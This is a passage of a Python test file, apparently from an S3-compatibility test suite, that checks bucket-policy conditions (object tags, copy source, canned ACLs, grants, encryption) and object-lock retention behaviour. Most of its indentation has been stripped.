alt_client = get_alt_client()
response = alt_client.get_object_tagging(Bucket=bucket_name, Key='publictag')
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
# A get object itself should fail since we allowed only GetObjectTagging
e = assert_raises(ClientError, alt_client.get_object, Bucket=bucket_name, Key='publictag')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
e = assert_raises(ClientError, alt_client.get_object_tagging, Bucket=bucket_name, Key='privatetag')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
e = assert_raises(ClientError, alt_client.get_object_tagging, Bucket=bucket_name, Key='invalidtag')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
@attr(resource='object')
@attr(method='get')
@attr(operation='Test ExistingObjectTag conditional on put object tagging')
@attr(assertion='success')
@attr('tagging')
@attr('bucket-policy')
def test_bucket_policy_put_obj_tagging_existing_tag():
bucket_name = _create_objects(keys=['publictag', 'privatetag', 'invalidtag'])
client = get_client()
tag_conditional = {"StringEquals": {
"s3:ExistingObjectTag/security" : "public"
}}
resource = _make_arn_resource("{}/{}".format(bucket_name, "*"))
policy_document = make_json_policy("s3:PutObjectTagging",
resource,
conditions=tag_conditional)
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
tagset = []
tagset.append({'Key': 'security', 'Value': 'public'})
tagset.append({'Key': 'foo', 'Value': 'bar'})
input_tagset = {'TagSet': tagset}
response = client.put_object_tagging(Bucket=bucket_name, Key='publictag', Tagging=input_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
tagset2 = []
tagset2.append({'Key': 'security', 'Value': 'private'})
input_tagset = {'TagSet': tagset2}
response = client.put_object_tagging(Bucket=bucket_name, Key='privatetag', Tagging=input_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
alt_client = get_alt_client()
    # PUT object tagging requests are a bit tricky with this policy: if a request
    # replaces the tag set without keeping the tag the condition requires
    # (security=public), the object stops matching the condition and subsequent
    # tagging requests will fail
testtagset1 = []
testtagset1.append({'Key': 'security', 'Value': 'public'})
testtagset1.append({'Key': 'foo', 'Value': 'bar'})
input_tagset = {'TagSet': testtagset1}
response = alt_client.put_object_tagging(Bucket=bucket_name, Key='publictag', Tagging=input_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
e = assert_raises(ClientError, alt_client.put_object_tagging, Bucket=bucket_name, Key='privatetag', Tagging=input_tagset)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
testtagset2 = []
testtagset2.append({'Key': 'security', 'Value': 'private'})
input_tagset = {'TagSet': testtagset2}
response = alt_client.put_object_tagging(Bucket=bucket_name, Key='publictag', Tagging=input_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
# Now try putting the original tags again, this should fail
input_tagset = {'TagSet': testtagset1}
e = assert_raises(ClientError, alt_client.put_object_tagging, Bucket=bucket_name, Key='publictag', Tagging=input_tagset)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
@attr(resource='object')
@attr(method='put')
@attr(operation='Test copy-source conditional on put obj')
@attr(assertion='success')
@attr('tagging')
@attr('bucket-policy')
def test_bucket_policy_put_obj_copy_source():
bucket_name = _create_objects(keys=['public/foo', 'public/bar', 'private/foo'])
client = get_client()
src_resource = _make_arn_resource("{}/{}".format(bucket_name, "*"))
policy_document = make_json_policy("s3:GetObject",
src_resource)
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
bucket_name2 = get_new_bucket()
tag_conditional = {"StringLike": {
"s3:x-amz-copy-source" : bucket_name + "/public/*"
}}
resource = _make_arn_resource("{}/{}".format(bucket_name2, "*"))
policy_document = make_json_policy("s3:PutObject",
resource,
conditions=tag_conditional)
client.put_bucket_policy(Bucket=bucket_name2, Policy=policy_document)
alt_client = get_alt_client()
copy_source = {'Bucket': bucket_name, 'Key': 'public/foo'}
alt_client.copy_object(Bucket=bucket_name2, CopySource=copy_source, Key='new_foo')
    # This read succeeds because the alt user is still the owner of the object it
    # copied; see the x-amz-grant tests below for how to hand ownership to the
    # bucket owner via policy
response = alt_client.get_object(Bucket=bucket_name2, Key='new_foo')
body = _get_body(response)
eq(body, 'public/foo')
copy_source = {'Bucket': bucket_name, 'Key': 'public/bar'}
alt_client.copy_object(Bucket=bucket_name2, CopySource=copy_source, Key='new_foo2')
response = alt_client.get_object(Bucket=bucket_name2, Key='new_foo2')
body = _get_body(response)
eq(body, 'public/bar')
copy_source = {'Bucket': bucket_name, 'Key': 'private/foo'}
check_access_denied(alt_client.copy_object, Bucket=bucket_name2, CopySource=copy_source, Key='new_foo2')
@attr(resource='object')
@attr(method='put')
@attr(operation='Test copy-source conditional on put obj')
@attr(assertion='success')
@attr('tagging')
@attr('bucket-policy')
def test_bucket_policy_put_obj_copy_source_meta():
src_bucket_name = _create_objects(keys=['public/foo', 'public/bar'])
client = get_client()
src_resource = _make_arn_resource("{}/{}".format(src_bucket_name, "*"))
policy_document = make_json_policy("s3:GetObject",
src_resource)
client.put_bucket_policy(Bucket=src_bucket_name, Policy=policy_document)
bucket_name = get_new_bucket()
tag_conditional = {"StringEquals": {
"s3:x-amz-metadata-directive" : "COPY"
}}
resource = _make_arn_resource("{}/{}".format(bucket_name, "*"))
policy_document = make_json_policy("s3:PutObject",
resource,
conditions=tag_conditional)
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
alt_client = get_alt_client()
lf = (lambda **kwargs: kwargs['params']['headers'].update({"x-amz-metadata-directive": "COPY"}))
alt_client.meta.events.register('before-call.s3.CopyObject', lf)
copy_source = {'Bucket': src_bucket_name, 'Key': 'public/foo'}
alt_client.copy_object(Bucket=bucket_name, CopySource=copy_source, Key='new_foo')
    # This read succeeds because the alt user is still the owner of the object it
    # copied; see the x-amz-grant tests below for how to hand ownership to the
    # bucket owner via policy
response = alt_client.get_object(Bucket=bucket_name, Key='new_foo')
body = _get_body(response)
eq(body, 'public/foo')
# remove the x-amz-metadata-directive header
def remove_header(**kwargs):
if ("x-amz-metadata-directive" in kwargs['params']['headers']):
del kwargs['params']['headers']["x-amz-metadata-directive"]
alt_client.meta.events.register('before-call.s3.CopyObject', remove_header)
copy_source = {'Bucket': src_bucket_name, 'Key': 'public/bar'}
check_access_denied(alt_client.copy_object, Bucket=bucket_name, CopySource=copy_source, Key='new_foo2', Metadata={"foo": "bar"})
@attr(resource='object')
@attr(method='put')
@attr(operation='Test put obj with canned-acl not to be public')
@attr(assertion='success')
@attr('tagging')
@attr('bucket-policy')
def test_bucket_policy_put_obj_acl():
bucket_name = get_new_bucket()
client = get_client()
    # An Allow conditional would require at least the presence of an x-amz-acl
    # header; the Deny conditional below instead rejects any request that tries to
    # set a public-read/public-read-write acl
conditional = {"StringLike": {
"s3:x-amz-acl" : "public*"
}}
p = Policy()
resource = _make_arn_resource("{}/{}".format(bucket_name, "*"))
s1 = Statement("s3:PutObject",resource)
s2 = Statement("s3:PutObject", resource, effect="Deny", condition=conditional)
policy_document = p.add_statement(s1).add_statement(s2).to_json()
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
alt_client = get_alt_client()
key1 = 'private-key'
    # To be really pedantic we could assert that this call does not raise and mark
    # a failure otherwise, but if it does raise, nosetests reports the test as an
    # ERROR anyway
response = alt_client.put_object(Bucket=bucket_name, Key=key1, Body=key1)
#response = alt_client.put_object_acl(Bucket=bucket_name, Key=key1, ACL='private')
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
key2 = 'public-key'
lf = (lambda **kwargs: kwargs['params']['headers'].update({"x-amz-acl": "public-read"}))
alt_client.meta.events.register('before-call.s3.PutObject', lf)
e = assert_raises(ClientError, alt_client.put_object, Bucket=bucket_name, Key=key2, Body=key2)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
@attr(resource='object')
@attr(method='put')
@attr(operation='Test put obj with amz-grant back to bucket-owner')
@attr(assertion='success')
@attr('bucket-policy')
def test_bucket_policy_put_obj_grant():
bucket_name = get_new_bucket()
bucket_name2 = get_new_bucket()
client = get_client()
    # Normally the uploader of a key is its owner. For the first bucket we
    # explicitly require that the bucket owner is granted full control over any
    # object uploaded by another user; the second bucket enforces no such policy,
    # so the uploader retains ownership there
main_user_id = get_main_user_id()
alt_user_id = get_alt_user_id()
owner_id_str = "id=" + main_user_id
s3_conditional = {"StringEquals": {
"s3:x-amz-grant-full-control" : owner_id_str
}}
resource = _make_arn_resource("{}/{}".format(bucket_name, "*"))
policy_document = make_json_policy("s3:PutObject",
resource,
conditions=s3_conditional)
resource = _make_arn_resource("{}/{}".format(bucket_name2, "*"))
policy_document2 = make_json_policy("s3:PutObject", resource)
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
client.put_bucket_policy(Bucket=bucket_name2, Policy=policy_document2)
alt_client = get_alt_client()
key1 = 'key1'
lf = (lambda **kwargs: kwargs['params']['headers'].update({"x-amz-grant-full-control" : owner_id_str}))
alt_client.meta.events.register('before-call.s3.PutObject', lf)
response = alt_client.put_object(Bucket=bucket_name, Key=key1, Body=key1)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
def remove_header(**kwargs):
if ("x-amz-grant-full-control" in kwargs['params']['headers']):
del kwargs['params']['headers']["x-amz-grant-full-control"]
alt_client.meta.events.register('before-call.s3.PutObject', remove_header)
key2 = 'key2'
response = alt_client.put_object(Bucket=bucket_name2, Key=key2, Body=key2)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
acl1_response = client.get_object_acl(Bucket=bucket_name, Key=key1)
    # the main user tries to get the acl of the object the alt user uploaded to the
    # bucket where ownership was not transferred
check_access_denied(client.get_object_acl, Bucket=bucket_name2, Key=key2)
acl2_response = alt_client.get_object_acl(Bucket=bucket_name2, Key=key2)
eq(acl1_response['Grants'][0]['Grantee']['ID'], main_user_id)
eq(acl2_response['Grants'][0]['Grantee']['ID'], alt_user_id)
@attr(resource='object')
@attr(method='put')
@attr(operation='Deny put obj requests without encryption')
@attr(assertion='success')
@attr('encryption')
@attr('bucket-policy')
# TODO: remove this 'fails_on_rgw' once I get the test passing
@attr('fails_on_rgw')
def test_bucket_policy_put_obj_enc():
bucket_name = get_new_bucket()
client = get_v2_client()
deny_incorrect_algo = {
"StringNotEquals": {
"s3:x-amz-server-side-encryption": "AES256"
}
}
deny_unencrypted_obj = {
"Null" : {
"s3:x-amz-server-side-encryption": "true"
}
}
p = Policy()
resource = _make_arn_resource("{}/{}".format(bucket_name, "*"))
s1 = Statement("s3:PutObject", resource, effect="Deny", condition=deny_incorrect_algo)
s2 = Statement("s3:PutObject", resource, effect="Deny", condition=deny_unencrypted_obj)
policy_document = p.add_statement(s1).add_statement(s2).to_json()
boto3.set_stream_logger(name='botocore')
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
key1_str ='testobj'
#response = client.get_bucket_policy(Bucket=bucket_name)
#print response
check_access_denied(client.put_object, Bucket=bucket_name, Key=key1_str, Body=key1_str)
sse_client_headers = {
'x-amz-server-side-encryption' : 'AES256',
'x-amz-server-side-encryption-customer-algorithm': 'AES256',
'x-amz-server-side-encryption-customer-key': 'pO3upElrwuEXSoFwCfnZPdSsmt/xWeFa0N9KgDijwVs=',
'x-amz-server-side-encryption-customer-key-md5': 'DWygnHRtgiJ77HCm+1rvHw=='
}
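    # Note: these headers ask for SSE-S3 (x-amz-server-side-encryption: AES256) and
    # SSE-C (the customer-* headers) on the same request; on AWS that combination is
    # rejected, which may be related to the 400 noted in the TODO below.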
lf = (lambda **kwargs: kwargs['params']['headers'].update(sse_client_headers))
client.meta.events.register('before-call.s3.PutObject', lf)
#TODO: why is this a 400 and not passing, it appears boto3 is not parsing the 200 response the rgw sends back properly
# DEBUGGING: run the boto2 and compare the requests
# DEBUGGING: try to run this with v2 auth (figure out why get_v2_client isn't working) to make the requests similar to what boto2 is doing
# DEBUGGING: try to add other options to put_object to see if that makes the response better
client.put_object(Bucket=bucket_name, Key=key1_str)
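# For comparison, a hypothetical sketch (not called by the tests here) of sending
# SSE-C through boto3's native parameters instead of injecting raw headers; botocore
# base64-encodes the raw key and fills in the key MD5 itself. The key below is only
# an example value.
def _put_obj_sse_c_via_params(client, bucket_name, key, body):
    return client.put_object(
        Bucket=bucket_name, Key=key, Body=body,
        SSECustomerAlgorithm='AES256',
        SSECustomerKey='0123456789abcdef0123456789abcdef')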
@attr(resource='object')
@attr(method='put')
@attr(operation='put obj with RequestObjectTag')
@attr(assertion='success')
@attr('tagging')
@attr('bucket-policy')
# TODO: remove this fails_on_rgw when I fix it
@attr('fails_on_rgw')
def test_bucket_policy_put_obj_request_obj_tag():
bucket_name = get_new_bucket()
client = get_client()
tag_conditional = {"StringEquals": {
"s3:RequestObjectTag/security" : "public"
}}
p = Policy()
resource = _make_arn_resource("{}/{}".format(bucket_name, "*"))
s1 = Statement("s3:PutObject", resource, effect="Allow", condition=tag_conditional)
policy_document = p.add_statement(s1).to_json()
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
alt_client = get_alt_client()
key1_str ='testobj'
check_access_denied(alt_client.put_object, Bucket=bucket_name, Key=key1_str, Body=key1_str)
headers = {"x-amz-tagging" : "security=public"}
lf = (lambda **kwargs: kwargs['params']['headers'].update(headers))
    alt_client.meta.events.register('before-call.s3.PutObject', lf)
#TODO: why is this a 400 and not passing
alt_client.put_object(Bucket=bucket_name, Key=key1_str, Body=key1_str)
@attr(resource='object')
@attr(method='get')
@attr(operation='Test ExistingObjectTag conditional on get object acl')
@attr(assertion='success')
@attr('tagging')
@attr('bucket-policy')
def test_bucket_policy_get_obj_acl_existing_tag():
bucket_name = _create_objects(keys=['publictag', 'privatetag', 'invalidtag'])
client = get_client()
tag_conditional = {"StringEquals": {
"s3:ExistingObjectTag/security" : "public"
}}
resource = _make_arn_resource("{}/{}".format(bucket_name, "*"))
policy_document = make_json_policy("s3:GetObjectAcl",
resource,
conditions=tag_conditional)
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
tagset = []
tagset.append({'Key': 'security', 'Value': 'public'})
tagset.append({'Key': 'foo', 'Value': 'bar'})
input_tagset = {'TagSet': tagset}
response = client.put_object_tagging(Bucket=bucket_name, Key='publictag', Tagging=input_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
tagset2 = []
tagset2.append({'Key': 'security', 'Value': 'private'})
input_tagset = {'TagSet': tagset2}
response = client.put_object_tagging(Bucket=bucket_name, Key='privatetag', Tagging=input_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
tagset3 = []
tagset3.append({'Key': 'security1', 'Value': 'public'})
input_tagset = {'TagSet': tagset3}
response = client.put_object_tagging(Bucket=bucket_name, Key='invalidtag', Tagging=input_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
alt_client = get_alt_client()
response = alt_client.get_object_acl(Bucket=bucket_name, Key='publictag')
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
    # A get object itself should fail since we allowed only GetObjectAcl
e = assert_raises(ClientError, alt_client.get_object, Bucket=bucket_name, Key='publictag')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
e = assert_raises(ClientError, alt_client.get_object_tagging, Bucket=bucket_name, Key='privatetag')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
e = assert_raises(ClientError, alt_client.get_object_tagging, Bucket=bucket_name, Key='invalidtag')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='Test put object lock with default retention')
@attr(assertion='success')
@attr('object-lock')
def test_object_lock_put_obj_lock():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
conf = {'ObjectLockEnabled':'Enabled',
'Rule': {
'DefaultRetention':{
'Mode':'GOVERNANCE',
'Days':1
}
}}
response = client.put_object_lock_configuration(
Bucket=bucket_name,
ObjectLockConfiguration=conf)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
conf = {'ObjectLockEnabled':'Enabled',
'Rule': {
'DefaultRetention':{
'Mode':'COMPLIANCE',
'Years':1
}
}}
response = client.put_object_lock_configuration(
Bucket=bucket_name,
ObjectLockConfiguration=conf)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
response = client.get_bucket_versioning(Bucket=bucket_name)
eq(response['Status'], 'Enabled')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='Test put object lock with bucket object lock not enabled')
@attr(assertion='fails')
@attr('object-lock')
def test_object_lock_put_obj_lock_invalid_bucket():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name)
conf = {'ObjectLockEnabled':'Enabled',
'Rule': {
'DefaultRetention':{
'Mode':'GOVERNANCE',
'Days':1
}
}}
e = assert_raises(ClientError, client.put_object_lock_configuration, Bucket=bucket_name, ObjectLockConfiguration=conf)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 409)
eq(error_code, 'InvalidBucketState')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='Test put object lock with days and years')
@attr(assertion='fails')
@attr('object-lock')
def test_object_lock_put_obj_lock_with_days_and_years():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
conf = {'ObjectLockEnabled':'Enabled',
'Rule': {
'DefaultRetention':{
'Mode':'GOVERNANCE',
'Days':1,
'Years':1
}
}}
e = assert_raises(ClientError, client.put_object_lock_configuration, Bucket=bucket_name, ObjectLockConfiguration=conf)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'MalformedXML')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='Test put object lock with invalid days')
@attr(assertion='fails')
@attr('object-lock')
def test_object_lock_put_obj_lock_invalid_days():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
conf = {'ObjectLockEnabled':'Enabled',
'Rule': {
'DefaultRetention':{
'Mode':'GOVERNANCE',
'Days':0
}
}}
e = assert_raises(ClientError, client.put_object_lock_configuration, Bucket=bucket_name, ObjectLockConfiguration=conf)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'InvalidRetentionPeriod')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='Test put object lock with invalid years')
@attr(assertion='fails')
@attr('object-lock')
def test_object_lock_put_obj_lock_invalid_years():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
conf = {'ObjectLockEnabled':'Enabled',
'Rule': {
'DefaultRetention':{
'Mode':'GOVERNANCE',
'Years':-1
}
}}
e = assert_raises(ClientError, client.put_object_lock_configuration, Bucket=bucket_name, ObjectLockConfiguration=conf)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'InvalidRetentionPeriod')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='Test put object lock with invalid mode')
@attr(assertion='fails')
@attr('object-lock')
def test_object_lock_put_obj_lock_invalid_mode():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
conf = {'ObjectLockEnabled':'Enabled',
'Rule': {
'DefaultRetention':{
'Mode':'abc',
'Years':1
}
}}
e = assert_raises(ClientError, client.put_object_lock_configuration, Bucket=bucket_name, ObjectLockConfiguration=conf)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'MalformedXML')
conf = {'ObjectLockEnabled':'Enabled',
'Rule': {
'DefaultRetention':{
'Mode':'governance',
'Years':1
}
}}
e = assert_raises(ClientError, client.put_object_lock_configuration, Bucket=bucket_name, ObjectLockConfiguration=conf)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'MalformedXML')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='Test put object lock with invalid status')
@attr(assertion='fails')
@attr('object-lock')
def test_object_lock_put_obj_lock_invalid_status():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
conf = {'ObjectLockEnabled':'Disabled',
'Rule': {
'DefaultRetention':{
'Mode':'GOVERNANCE',
'Years':1
}
}}
e = assert_raises(ClientError, client.put_object_lock_configuration, Bucket=bucket_name, ObjectLockConfiguration=conf)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'MalformedXML')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='Test suspend versioning when object lock enabled')
@attr(assertion='fails')
@attr('object-lock')
def test_object_lock_suspend_versioning():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
e = assert_raises(ClientError, client.put_bucket_versioning, Bucket=bucket_name, VersioningConfiguration={'Status': 'Suspended'})
status, error_code = _get_status_and_error_code(e.response)
eq(status, 409)
eq(error_code, 'InvalidBucketState')
@attr(resource='bucket')
@attr(method='get')
@attr(operation='Test get object lock')
@attr(assertion='success')
@attr('object-lock')
def test_object_lock_get_obj_lock():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
conf = {'ObjectLockEnabled':'Enabled',
'Rule': {
'DefaultRetention':{
'Mode':'GOVERNANCE',
'Days':1
}
}}
client.put_object_lock_configuration(
Bucket=bucket_name,
ObjectLockConfiguration=conf)
response = client.get_object_lock_configuration(Bucket=bucket_name)
eq(response['ObjectLockConfiguration'], conf)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='Test get object lock with bucket object lock not enabled')
@attr(assertion='fails')
@attr('object-lock')
def test_object_lock_get_obj_lock_invalid_bucket():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name)
e = assert_raises(ClientError, client.get_object_lock_configuration, Bucket=bucket_name)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 404)
eq(error_code, 'ObjectLockConfigurationNotFoundError')
@attr(resource='bucket')
@attr(method='get')
@attr(operation='Test put object retention')
@attr(assertion='success')
@attr('object-lock')
def test_object_lock_put_obj_retention():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
key = 'file1'
response = client.put_object(Bucket=bucket_name, Body='abc', Key=key)
version_id = response['VersionId']
retention = {'Mode':'GOVERNANCE', 'RetainUntilDate':datetime.datetime(2030,1,1,tzinfo=pytz.UTC)}
response = client.put_object_retention(Bucket=bucket_name, Key=key, Retention=retention)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
client.delete_object(Bucket=bucket_name, Key=key, VersionId=version_id, BypassGovernanceRetention=True)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='Test put object retention with bucket object lock not enabled')
@attr(assertion='fails')
@attr('object-lock')
def test_object_lock_put_obj_retention_invalid_bucket():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name)
key = 'file1'
client.put_object(Bucket=bucket_name, Body='abc', Key=key)
retention = {'Mode':'GOVERNANCE', 'RetainUntilDate':datetime.datetime(2030,1,1,tzinfo=pytz.UTC)}
e = assert_raises(ClientError, client.put_object_retention, Bucket=bucket_name, Key=key, Retention=retention)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'InvalidRequest')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='Test put object retention with invalid mode')
@attr(assertion='fails')
@attr('object-lock')
def test_object_lock_put_obj_retention_invalid_mode():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
key = 'file1'
client.put_object(Bucket=bucket_name, Body='abc', Key=key)
retention = {'Mode':'governance', 'RetainUntilDate':datetime.datetime(2030,1,1,tzinfo=pytz.UTC)}
e = assert_raises(ClientError, client.put_object_retention, Bucket=bucket_name, Key=key, Retention=retention)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'MalformedXML')
retention = {'Mode':'abc', 'RetainUntilDate':datetime.datetime(2030,1,1,tzinfo=pytz.UTC)}
e = assert_raises(ClientError, client.put_object_retention, Bucket=bucket_name, Key=key, Retention=retention)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'MalformedXML')
@attr(resource='bucket')
@attr(method='get')
@attr(operation='Test get object retention')
@attr(assertion='success')
@attr('object-lock')
def test_object_lock_get_obj_retention():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
key = 'file1'
response = client.put_object(Bucket=bucket_name, Body='abc', Key=key)
version_id = response['VersionId']
retention = {'Mode':'GOVERNANCE', 'RetainUntilDate':datetime.datetime(2030,1,1,tzinfo=pytz.UTC)}
client.put_object_retention(Bucket=bucket_name, Key=key, Retention=retention)
response = client.get_object_retention(Bucket=bucket_name, Key=key)
eq(response['Retention'], retention)
client.delete_object(Bucket=bucket_name, Key=key, VersionId=version_id, BypassGovernanceRetention=True)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='Test object retention date formatting')
@attr(assertion='success')
@attr('object-lock')
def test_object_lock_get_obj_retention_iso8601():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
key = 'file1'
response = client.put_object(Bucket=bucket_name, Body='abc', Key=key)
version_id = response['VersionId']
date = datetime.datetime.today() + datetime.timedelta(days=365)
retention = {'Mode':'GOVERNANCE', 'RetainUntilDate': date}
client.put_object_retention(Bucket=bucket_name, Key=key, Retention=retention)
client.meta.events.register('after-call.s3.HeadObject', get_http_response)
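    # get_http_response is presumably a helper defined earlier in this file that
    # stashes the raw HTTP response in the module-level http_response read below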
client.head_object(Bucket=bucket_name,VersionId=version_id,Key=key)
retain_date = http_response['headers']['x-amz-object-lock-retain-until-date']
isodate.parse_datetime(retain_date)
client.delete_object(Bucket=bucket_name, Key=key, VersionId=version_id, BypassGovernanceRetention=True)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='Test get object retention with invalid bucket')
@attr(assertion='fails')
@attr('object-lock')
def test_object_lock_get_obj_retention_invalid_bucket():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name)
key = 'file1'
client.put_object(Bucket=bucket_name, Body='abc', Key=key)
e = assert_raises(ClientError, client.get_object_retention, Bucket=bucket_name, Key=key)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'InvalidRequest')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='Test put object retention with version id')
@attr(assertion='success')
@attr('object-lock')
def test_object_lock_put_obj_retention_versionid():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
key = 'file1'
client.put_object(Bucket=bucket_name, Body='abc', Key=key)
response = client.put_object(Bucket=bucket_name, Body='abc', Key=key)
version_id = response['VersionId']
retention = {'Mode':'GOVERNANCE', 'RetainUntilDate':datetime.datetime(2030,1,1,tzinfo=pytz.UTC)}
client.put_object_retention(Bucket=bucket_name, Key=key, VersionId=version_id, Retention=retention)
response = client.get_object_retention(Bucket=bucket_name, Key=key, VersionId=version_id)
eq(response['Retention'], retention)
client.delete_object(Bucket=bucket_name, Key=key, VersionId=version_id, BypassGovernanceRetention=True)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='Test put object retention to override default retention')
@attr(assertion='success')
@attr('object-lock')
def test_object_lock_put_obj_retention_override_default_retention():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
conf = {'ObjectLockEnabled':'Enabled',
'Rule': {
'DefaultRetention':{
'Mode':'GOVERNANCE',
'Days':1
}
}}
client.put_object_lock_configuration(
Bucket=bucket_name,
ObjectLockConfiguration=conf)
key = 'file1'
response = client.put_object(Bucket=bucket_name, Body='abc', Key=key)
version_id = response['VersionId']
retention = {'Mode':'GOVERNANCE', 'RetainUntilDate':datetime.datetime(2030,1,1,tzinfo=pytz.UTC)}
client.put_object_retention(Bucket=bucket_name, Key=key, Retention=retention)
response = client.get_object_retention(Bucket=bucket_name, Key=key)
eq(response['Retention'], retention)
client.delete_object(Bucket=bucket_name, Key=key, VersionId=version_id, BypassGovernanceRetention=True)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='Test put object retention to increase retention period')
@attr(assertion='success')
@attr('object-lock')
def test_object_lock_put_obj_retention_increase_period():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
key = 'file1'
response = client.put_object(Bucket=bucket_name, Body='abc', Key=key)
version_id = response['VersionId']
retention1 = {'Mode':'GOVERNANCE', 'RetainUntilDate':datetime.datetime(2030,1,1,tzinfo=pytz.UTC)}
client.put_object_retention(Bucket=bucket_name, Key=key, Retention=retention1)
retention2 = {'Mode':'GOVERNANCE', 'RetainUntilDate':datetime.datetime(2030,1,3,tzinfo=pytz.UTC)}
client.put_object_retention(Bucket=bucket_name, Key=key, Retention=retention2)
response = client.get_object_retention(Bucket=bucket_name, Key=key)
eq(response['Retention'], retention2)
client.delete_object(Bucket=bucket_name, Key=key, VersionId=version_id, BypassGovernanceRetention=True)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='Test put object retention to shorten period')
@attr(assertion='fails')
@attr('object-lock')
def test_object_lock_put_obj_retention_shorten_period():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
key = 'file1'
response = client.put_object(Bucket=bucket_name, Body='abc', Key=key)
version_id = response['VersionId']
